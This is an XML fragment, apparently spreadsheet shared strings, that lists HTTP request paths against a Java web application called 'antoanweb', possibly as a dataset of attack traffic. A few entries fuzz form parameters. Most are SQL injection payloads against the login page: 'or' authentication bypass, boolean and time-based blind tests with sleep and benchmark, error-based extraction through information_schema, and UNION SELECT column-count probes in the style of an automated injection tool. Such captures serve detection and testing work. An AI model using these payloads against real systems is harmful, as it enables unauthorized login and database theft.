    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=a\\'bult\\'ada&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=4bu21a3/0&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=ab89//t3m63nt9&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=off/&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=on/&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=+on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=+off&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=o-n&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=o-ff&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember==n&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=0ff&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=0n&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=of1f&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=o,n&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=off,&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=3416&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=3305&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.())')))"))&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)and2323=5295&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)and3673=3673&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')and1512=8534&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')and3673=3673&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and5619=6620&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and3673=3673&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30."and1861=7325&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30."and3673=3673&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)and2094=8197and(7353=7353&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)and3673=3673and(5591=5591&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.))and3821=6259and((3957=3957&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.))and3673=3673and((6542=6542&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)))and2998=6614and(((8703=8703&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.)))and3673=3673and(((6920=6920&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.and2646=7740&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.and3673=3673&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')and7422=5880and('wwzy'='wwzy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')and3673=3673and('mouv'='mouv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'))and601=870and(('gwsp'='gwsp&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'))and3673=3673and(('gqeq'='gqeq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')))and1575=8327and((('piiu'='piiu&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.')))and3673=3673and((('nhop'='nhop&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and5464=2559and'xkao'='xkao&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and3673=3673and'ufwr'='ufwr&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and4204=2883and'durs'='durs&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'and(select313from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(313=313)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'ocep'='ocep&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.';selectsleep(5);--and'mwym'='mwym&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.';selectbenchmark(5000000,md5(char(103,103,118,65)));--and'dqiu'='dqiu&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'andsleep(5)and'ktam'='ktam&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull#and'gzxg'='gzxg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null#and'yoio'='yoio&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null#and'ykwb'='ykwb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null#and'trbe'='trbe&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null#and'vuur'='vuur&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null#and'blxq'='blxq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null#and'jfww'='jfww&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null#and'uame'='uame&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null#and'tksn'='tksn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null#and'cyxg'='cyxg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(81,75,65,117,68,111,78,107,102,77)aschar),char(32)),char(58,101,107,121,58))#and'ukau'='ukau&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=-4759'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(122,116,82,104,116,119,65,90,98,65)aschar),char(32)),char(58,101,107,121,58))#and'rnat'='rnat&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8618#and'jgcw'='jgcw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7166,7166#and'hdjz'='hdjz&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3660,3660,3660#and'ikep'='ikep&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9184,9184,9184,9184#and'eyll'='eyll&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5941,5941,5941,5941,5941#and'spxv'='spxv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8880,8880,8880,8880,8880,8880#and'mfuy'='mfuy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect789,789,789,789,789,789,789#and'meuy'='meuy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7916,7916,7916,7916,7916,7916,7916,7916#and'irxk'='irxk&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7921,7921,7921,7921,7921,7921,7921,7921,7921#and'wyyt'='wyyt&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3820,3820,3820,3820,3820,3820,3820,3820,3820,3820#and'sydh'='sydh&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(72,80,100,107,81,87,113,106,114,81)aschar),char(32)),char(58,101,107,121,58))#and'fmtg'='fmtg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=-9033'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(100,113,118,69,116,80,101,69,122,104)aschar),char(32)),char(58,101,107,121,58))#and'gugy'='gugy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'nmtg'='nmtg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'july'='july&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'kdxr'='kdxr&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'rktz'='rktz&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'fnxf'='fnxf&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'pnkb'='pnkb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ajmy'='ajmy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'isif'='isif&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'sprb'='sprb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'muwt'='muwt&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6326,6326,6326,6326,6326,6326,6326,6326,6326,6326,6326#and'buvn'='buvn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195#and'kihd'='kihd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3542,3542,3542,3542,3542,3542,3542,3542,3542,3542,3542,3542,3542#and'gaeq'='gaeq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2760,2760,2760,2760,2760,2760,2760,2760,2760,2760,2760,2760,2760,2760#and'dnxj'='dnxj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6607,6607,6607,6607,6607,6607,6607,6607,6607,6607,6607,6607,6607,6607,6607#and'alnn'='alnn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919#and'umvj'='umvj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312,4312#and'cfzi'='cfzi&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618,6618#and'wqlj'='wqlj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155,9155#and'xtuq'='xtuq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767,5767#and'imrm'='imrm&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'xfgv'='xfgv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'vfvb'='vfvb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ctmo'='ctmo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bpne'='bpne&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bxao'='bxao&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'mofc'='mofc&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'tcpu'='tcpu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#and'bozw'='bozw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#and'ergh'='ergh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#and'tncw'='tncw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363,4363#and'qbix'='qbix&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731,8731#and'kxwj'='kxwj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553,8553#and'mpwl'='mpwl&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25#and'yyng'='yyng&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405#and'xqij'='xqij&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9#and'mfhd'='mfhd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752#and'yozm'='yozm&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690,2690#and'gjtk'='gjtk&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253#and'wsoy'='wsoy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037,2037#and'hmpz'='hmpz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#and'tfuy'='tfuy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#and'yuyl'='yuyl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#and'tiud'='tiud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#and'erhb'='erhb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#and'dkgq'='dkgq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#and'bahv'='bahv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#and'ncdy'='ncdy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#and'hczv'='hczv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#and'ntjm'='ntjm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#and'pllt'='pllt&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030,8030#and'txoi'='txoi&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111,4111#and'vkxt'='vkxt&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102,7102#and'pjsh'='pjsh&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790,7790#and'rlkf'='rlkf&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169,9169#and'jkdw'='jkdw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943#and'icjo'='icjo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890#and'mygy'='mygy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016,2016#and'dbku'='dbku&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688,5688#and'fqty'='fqty&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521,5521#and'ycdb'='ycdb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#and'yeau'='yeau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#and'sllx'='sllx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#and'xddn'='xddn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#and'zcba'='zcba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#and'ttxq'='ttxq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#and'nahr'='nahr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,null#and'pahs'='pahs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,null,null#and'yrlb'='yrlb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,null,null,null#and'mwsi'='mwsi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,null,null,null,null#and'borj'='borj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
